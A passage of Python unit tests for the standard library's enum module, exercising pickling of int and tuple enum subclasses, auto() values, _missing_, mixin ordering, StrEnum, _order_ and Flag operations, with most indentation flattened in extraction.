x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce_ex__(self, proto):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
                temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_without_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
                temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
                    temp,
                )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_exception(self.assertRaises, TypeError, NEI.x)
test_pickle_exception(self.assertRaises, PicklingError, NEI)
def test_subclasses_without_direct_pickle_support_using_name(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
                temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
def __reduce_ex__(self, proto):
return getattr, (self.__class__, self._name_)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_tuple_subclass(self):
class SomeTuple(tuple, Enum):
__qualname__ = 'SomeTuple' # needed for pickle protocol 4
first = (1, 'for the money')
second = (2, 'for the show')
third = (3, 'for the music')
self.assertIs(type(SomeTuple.first), SomeTuple)
self.assertIsInstance(SomeTuple.second, tuple)
self.assertEqual(SomeTuple.third, (3, 'for the music'))
globals()['SomeTuple'] = SomeTuple
test_pickle_dump_load(self.assertIs, SomeTuple.first)
def test_duplicate_values_give_unique_enum_items(self):
class AutoNumber(Enum):
first = ()
second = ()
third = ()
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
self.assertEqual(
list(AutoNumber),
[AutoNumber.first, AutoNumber.second, AutoNumber.third],
)
self.assertEqual(int(AutoNumber.second), 2)
self.assertEqual(AutoNumber.third.value, 3)
self.assertIs(AutoNumber(1), AutoNumber.first)
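    # The __new__-based counter above assigns values before any of Enum's
    # machinery runs, so _value_ must be set by hand; by-value lookup
    # (AutoNumber(1)) still works because every member received a distinct
    # _value_.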
def test_inherited_new_from_enhanced_enum(self):
class AutoNumber(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_inherited_new_from_mixed_enum(self):
class AutoNumber(IntEnum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = int.__new__(cls, value)
obj._value_ = value
return obj
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_equality(self):
class OrdinaryEnum(Enum):
a = 1
self.assertEqual(ALWAYS_EQ, OrdinaryEnum.a)
self.assertEqual(OrdinaryEnum.a, ALWAYS_EQ)
def test_ordered_mixin(self):
class OrderedEnum(Enum):
def __ge__(self, other):
if self.__class__ is other.__class__:
return self._value_ >= other._value_
return NotImplemented
def __gt__(self, other):
if self.__class__ is other.__class__:
return self._value_ > other._value_
return NotImplemented
def __le__(self, other):
if self.__class__ is other.__class__:
return self._value_ <= other._value_
return NotImplemented
def __lt__(self, other):
if self.__class__ is other.__class__:
return self._value_ < other._value_
return NotImplemented
class Grade(OrderedEnum):
A = 5
B = 4
C = 3
D = 2
F = 1
self.assertGreater(Grade.A, Grade.B)
self.assertLessEqual(Grade.F, Grade.C)
self.assertLess(Grade.D, Grade.A)
self.assertGreaterEqual(Grade.B, Grade.B)
self.assertEqual(Grade.B, Grade.B)
self.assertNotEqual(Grade.C, Grade.D)
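    # A possible condensation (not exercised here): functools.total_ordering
    # could derive three of these four methods from __lt__ plus the
    # inherited __eq__, at the cost of an extra wrapper per comparison.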
def test_extending2(self):
class Shade(Enum):
def shade(self):
print(self.name)
class Color(Shade):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_extending3(self):
class Shade(Enum):
def shade(self):
return self.name
class Color(Shade):
def hex(self):
return '%s hexlified!' % self.value
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')
def test_subclass_duplicate_name(self):
class Base(Enum):
def test(self):
pass
class Test(Base):
test = 1
self.assertIs(type(Test.test), Test)
def test_subclass_duplicate_name_dynamic(self):
from types import DynamicClassAttribute
class Base(Enum):
@DynamicClassAttribute
def test(self):
return 'dynamic'
class Test(Base):
test = 1
self.assertEqual(Test.test.test, 'dynamic')
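    # DynamicClassAttribute is why 'name' and 'value' can double as member
    # names: the attribute is served on instances but hidden on the class,
    # so class-level access falls through to the member lookup.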
def test_no_duplicates(self):
class UniqueEnum(Enum):
def __init__(self, *args):
cls = self.__class__
if any(self.value == e.value for e in cls):
a = self.name
e = cls(self.value).name
raise ValueError(
"aliases not allowed in UniqueEnum: %r --> %r"
% (a, e)
)
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
grene = 2
def test_init(self):
class Planet(Enum):
MERCURY = (3.303e+23, 2.4397e6)
VENUS = (4.869e+24, 6.0518e6)
EARTH = (5.976e+24, 6.37814e6)
MARS = (6.421e+23, 3.3972e6)
JUPITER = (1.9e+27, 7.1492e7)
SATURN = (5.688e+26, 6.0268e7)
URANUS = (8.686e+25, 2.5559e7)
NEPTUNE = (1.024e+26, 2.4746e7)
def __init__(self, mass, radius):
self.mass = mass # in kilograms
self.radius = radius # in meters
@property
def surface_gravity(self):
                # universal gravitational constant (m^3 kg^-1 s^-2)
G = 6.67300E-11
return G * self.mass / (self.radius * self.radius)
self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))
def test_ignore(self):
class Period(timedelta, Enum):
'''
different lengths of time
'''
def __new__(cls, value, period):
obj = timedelta.__new__(cls, value)
obj._value_ = value
obj.period = period
return obj
_ignore_ = 'Period i'
Period = vars()
for i in range(13):
Period['month_%d' % i] = i*30, 'month'
for i in range(53):
Period['week_%d' % i] = i*7, 'week'
for i in range(32):
Period['day_%d' % i] = i, 'day'
OneDay = day_1
OneWeek = week_1
OneMonth = month_1
self.assertFalse(hasattr(Period, '_ignore_'))
self.assertFalse(hasattr(Period, 'Period'))
self.assertFalse(hasattr(Period, 'i'))
        self.assertIsInstance(Period.day_1, timedelta)
        self.assertIs(Period.month_1, Period.day_30)
        self.assertIs(Period.week_4, Period.day_28)
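    # _ignore_ strips the listed names ('Period', 'i') from the class body
    # before members are created, which is why the loop scaffolding above
    # never becomes part of the finished enumeration.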
def test_nonhash_value(self):
class AutoNumberInAList(Enum):
def __new__(cls):
value = [len(cls.__members__) + 1]
obj = object.__new__(cls)
obj._value_ = value
return obj
class ColorInAList(AutoNumberInAList):
red = ()
green = ()
blue = ()
self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
        for member, value in zip(ColorInAList, range(3)):
            value += 1
            self.assertEqual(member.value, [value])
            self.assertIs(ColorInAList([value]), member)
def test_conflicting_types_resolved_in_new(self):
class LabelledIntEnum(int, Enum):
def __new__(cls, *args):
value, label = args
obj = int.__new__(cls, value)
obj.label = label
obj._value_ = value
return obj
class LabelledList(LabelledIntEnum):
unprocessed = (1, "Unprocessed")
payment_complete = (2, "Payment Complete")
self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
self.assertEqual(LabelledList.unprocessed, 1)
self.assertEqual(LabelledList(1), LabelledList.unprocessed)
def test_auto_number(self):
class Color(Enum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_name(self):
class Color(Enum):
def _generate_next_value_(name, start, count, last):
return name
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
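    # _generate_next_value_ is called as a plain function before any members
    # exist; its (name, start, count, last_values) signature receives the
    # member name first, so returning `name` makes each value its own name.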
def test_auto_name_inherit(self):
class AutoNameEnum(Enum):
def _generate_next_value_(name, start, count, last):
return name
class Color(AutoNameEnum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_garbage(self):
class Color(Enum):
red = 'red'
blue = auto()
self.assertEqual(Color.blue.value, 1)
def test_auto_garbage_corrected(self):
class Color(Enum):
red = 'red'
blue = 2
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_order(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = auto()
green = auto()
blue = auto()
def _generate_next_value_(name, start, count, last):
return name
    def test_auto_order_weird(self):
weird_auto = auto()
weird_auto.value = 'pathological case'
class Color(Enum):
red = weird_auto
def _generate_next_value_(name, start, count, last):
return name
blue = auto()
self.assertEqual(list(Color), [Color.red, Color.blue])
self.assertEqual(Color.red.value, 'pathological case')
self.assertEqual(Color.blue.value, 'blue')
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_default_missing(self):
class Color(Enum):
RED = 1
GREEN = 2
BLUE = 3
try:
Color(7)
except ValueError as exc:
            self.assertIsNone(exc.__context__)
else:
raise Exception('Exception not raised.')
def test_missing(self):
class Color(Enum):
red = 1
green = 2
blue = 3
@classmethod
def _missing_(cls, item):
if item == 'three':
return cls.blue
elif item == 'bad return':
# trigger internal error
return 5
elif item == 'error out':
raise ZeroDivisionError
else:
# trigger not found
return None
self.assertIs(Color('three'), Color.blue)
try:
Color(7)
except ValueError as exc:
            self.assertIsNone(exc.__context__)
else:
raise Exception('Exception not raised.')
try:
Color('bad return')
except TypeError as exc:
            self.assertIsInstance(exc.__context__, ValueError)
else:
raise Exception('Exception not raised.')
try:
Color('error out')
except ZeroDivisionError as exc:
            self.assertIsInstance(exc.__context__, ValueError)
else:
raise Exception('Exception not raised.')
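    # _missing_ contract, as exercised above: returning a member satisfies
    # the lookup, returning None produces a clean ValueError, and a bogus
    # return type or a raised exception is chained onto that ValueError.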
def test_multiple_mixin(self):
class MaxMixin:
@classproperty
def MAX(cls):
max = len(cls)
cls.MAX = max
return max
class StrMixin:
def __str__(self):
return self._name_.lower()
class SomeEnum(Enum):
def behavior(self):
return 'booyah'
class AnotherEnum(Enum):
def behavior(self):
return 'nuhuh!'
def social(self):
return "what's up?"
class Color(MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(MaxMixin, StrMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class CoolColor(StrMixin, SomeEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolColor.RED.value, 1)
self.assertEqual(CoolColor.GREEN.value, 2)
self.assertEqual(CoolColor.BLUE.value, 3)
self.assertEqual(str(CoolColor.BLUE), 'blue')
self.assertEqual(CoolColor.RED.behavior(), 'booyah')
class CoolerColor(StrMixin, AnotherEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolerColor.RED.value, 1)
self.assertEqual(CoolerColor.GREEN.value, 2)
self.assertEqual(CoolerColor.BLUE.value, 3)
self.assertEqual(str(CoolerColor.BLUE), 'blue')
self.assertEqual(CoolerColor.RED.behavior(), 'nuhuh!')
self.assertEqual(CoolerColor.RED.social(), "what's up?")
class CoolestColor(StrMixin, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolestColor.RED.value, 1)
self.assertEqual(CoolestColor.GREEN.value, 2)
self.assertEqual(CoolestColor.BLUE.value, 3)
self.assertEqual(str(CoolestColor.BLUE), 'blue')
self.assertEqual(CoolestColor.RED.behavior(), 'booyah')
self.assertEqual(CoolestColor.RED.social(), "what's up?")
class ConfusedColor(StrMixin, AnotherEnum, SomeEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ConfusedColor.RED.value, 1)
self.assertEqual(ConfusedColor.GREEN.value, 2)
self.assertEqual(ConfusedColor.BLUE.value, 3)
self.assertEqual(str(ConfusedColor.BLUE), 'blue')
self.assertEqual(ConfusedColor.RED.behavior(), 'nuhuh!')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
class ReformedColor(StrMixin, IntEnum, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ReformedColor.RED.value, 1)
self.assertEqual(ReformedColor.GREEN.value, 2)
self.assertEqual(ReformedColor.BLUE.value, 3)
self.assertEqual(str(ReformedColor.BLUE), 'blue')
self.assertEqual(ReformedColor.RED.behavior(), 'booyah')
self.assertEqual(ReformedColor.RED.social(), "what's up?")
self.assertTrue(issubclass(ReformedColor, int))
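# Note on the mixin orderings above: which __str__ wins is plain MRO
# resolution -- StrMixin must precede Enum (directly or via another parent)
# for the lowercase names to take effect. MaxMixin.MAX is a classproperty
# that computes len(cls) once and then caches the result by shadowing itself
# with a plain class attribute.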
def test_multiple_inherited_mixin(self):
@unique
class Decision1(StrEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
class MyEnum(StrEnum):
pass
@unique
class Decision2(MyEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
def test_multiple_mixin_inherited(self):
class MyInt(int):
def __new__(cls, value):
return super().__new__(cls, value)
class HexMixin:
def __repr__(self):
return hex(self)
class MyIntEnum(HexMixin, MyInt, enum.Enum):
pass
class Foo(MyIntEnum):
TEST = 1
self.assertTrue(isinstance(Foo.TEST, MyInt))
self.assertEqual(repr(Foo.TEST), "0x1")
class Fee(MyIntEnum):
TEST = 1
def __new__(cls, value):
value += 1
member = int.__new__(cls, value)
member._value_ = value
return member
self.assertEqual(Fee.TEST, 2)
def test_empty_globals(self):
# bpo-35717: sys._getframe(2).f_globals['__name__'] fails with KeyError
# when using compile and exec because f_globals is empty
code = "from enum import Enum; Enum('Animal', 'ANT BEE CAT DOG')"
code = compile(code, "<string>", "exec")
global_ns = {}
local_ns = {}
exec(code, global_ns, local_ns)
def test_strenum(self):
class GoodStrEnum(StrEnum):
one = '1'
two = '2'
three = b'3', 'ascii'
four = b'4', 'latin1', 'strict'
self.assertEqual(GoodStrEnum.one, '1')
self.assertEqual(str(GoodStrEnum.one), '1')
self.assertEqual(GoodStrEnum.one, str(GoodStrEnum.one))
self.assertEqual(GoodStrEnum.one, '{}'.format(GoodStrEnum.one))
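# A sketch of why the tuple values above work: StrEnum passes each value
# through str(), so str(b'3', 'ascii') and str(b'4', 'latin1', 'strict')
# decode the bytes, mirroring str()'s (object, encoding, errors) signature --
# which is also why the failure cases below complain about non-string
# encodings and errors arguments.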
#
class DumbMixin:
def __str__(self):
return "don't do this"
class DumbStrEnum(DumbMixin, StrEnum):
five = '5'
six = '6'
seven = '7'
self.assertEqual(DumbStrEnum.seven, '7')
self.assertEqual(str(DumbStrEnum.seven), "don't do this")
#
class EnumMixin(Enum):
def hello(self):
print('hello from %s' % (self, ))
class HelloEnum(EnumMixin, StrEnum):
eight = '8'
self.assertEqual(HelloEnum.eight, '8')
self.assertEqual(HelloEnum.eight, str(HelloEnum.eight))
#
class GoodbyeMixin:
def goodbye(self):
print('%s wishes you a fond farewell' % (self, ))
class GoodbyeEnum(GoodbyeMixin, EnumMixin, StrEnum):
nine = '9'
self.assertEqual(GoodbyeEnum.nine, '9')
self.assertEqual(GoodbyeEnum.nine, str(GoodbyeEnum.nine))
#
with self.assertRaisesRegex(TypeError, '1 is not a string'):
class FirstFailedStrEnum(StrEnum):
one = 1
two = '2'
with self.assertRaisesRegex(TypeError, "2 is not a string"):
class SecondFailedStrEnum(StrEnum):
one = '1'
two = 2,
three = '3'
with self.assertRaisesRegex(TypeError, '2 is not a string'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = 2
with self.assertRaisesRegex(TypeError, 'encoding must be a string, not %r' % (sys.getdefaultencoding, )):
class FourthFailedStrEnum(StrEnum):
one = '1'
two = b'2', sys.getdefaultencoding
with self.assertRaisesRegex(TypeError, 'errors must be a string, not 9'):
class FifthFailedStrEnum(StrEnum):
one = '1'
two = b'2', 'ascii', 9
def test_init_subclass(self):
class MyEnum(Enum):
def __init_subclass__(cls, **kwds):
super(MyEnum, cls).__init_subclass__(**kwds)
self.assertFalse(cls.__dict__.get('_test', False))
cls._test1 = 'MyEnum'
#
class TheirEnum(MyEnum):
def __init_subclass__(cls, **kwds):
super().__init_subclass__(**kwds)
cls._test2 = 'TheirEnum'
class WhoseEnum(TheirEnum):
def __init_subclass__(cls, **kwds):
pass
class NoEnum(WhoseEnum):
ONE = 1
self.assertEqual(TheirEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test2'], 'TheirEnum')
self.assertFalse(NoEnum.__dict__.get('_test1', False))
self.assertFalse(NoEnum.__dict__.get('_test2', False))
#
class OurEnum(MyEnum):
def __init_subclass__(cls, **kwds):
cls._test2 = 'OurEnum'
class WhereEnum(OurEnum):
def __init_subclass__(cls, **kwds):
pass
class NeverEnum(WhereEnum):
ONE = 'one'
self.assertEqual(OurEnum.__dict__['_test1'], 'MyEnum')
self.assertFalse(WhereEnum.__dict__.get('_test1', False))
self.assertEqual(WhereEnum.__dict__['_test2'], 'OurEnum')
self.assertFalse(NeverEnum.__dict__.get('_test1', False))
self.assertFalse(NeverEnum.__dict__.get('_test2', False))
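# The pattern above: an __init_subclass__ that calls super() keeps every
# ancestor hook in the chain (TheirEnum still receives _test1 from MyEnum),
# while one that skips super() (OurEnum, WhoseEnum) severs it, so later
# subclasses only see the effects of hooks that were actually invoked.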
@unittest.skipUnless(
sys.version_info[:2] == (3, 9),
'private variables are now normal attributes',
)
def test_warning_for_private_variables(self):
with self.assertWarns(DeprecationWarning):
class Private(Enum):
__corporal = 'Radar'
self.assertEqual(Private._Private__corporal.value, 'Radar')
try:
with self.assertWarns(DeprecationWarning):
class Private(Enum):
__major_ = 'Hoolihan'
except ValueError:
pass
def test_private_variable_is_normal_attribute(self):
class Private(Enum):
__corporal = 'Radar'
__major_ = 'Hoolihan'
self.assertEqual(Private._Private__corporal, 'Radar')
self.assertEqual(Private._Private__major_, 'Hoolihan')
class TestOrder(unittest.TestCase):
def test_same_members(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
def test_same_members_with_aliases(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
verde = green
def test_same_members_wrong_order(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
blue = 3
green = 2
def test_order_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
def test_order_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
verde = green
def test_enum_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
def test_enum_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
verde = green
class TestFlag(unittest.TestCase):
"""Tests of the Flags."""
class Perm(Flag):
R, W, X = 4, 2, 1
class Open(Flag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(Flag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.0')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: 3>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: 5>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: 6>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: 1>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: 7>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: 524291>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: 524290>')
self.assertEqual(repr(~Open.AC), '<Open.CE: 524288>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC: 3>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: 2>')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), 'Perm.R')
self.assertEqual(format(Perm.R | Perm.X, ''), 'Perm.R|X')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i | j), Perm(i.value | j.value))
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for i in Perm:
self.assertIs(i | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual((i & j).value, i.value & j.value)
self.assertIs(type(i & j), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & RWX, i)
self.assertIs(RWX & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for i in Perm:
self.assertIs(i ^ Perm(0), i)
self.assertIs(Perm(0) ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
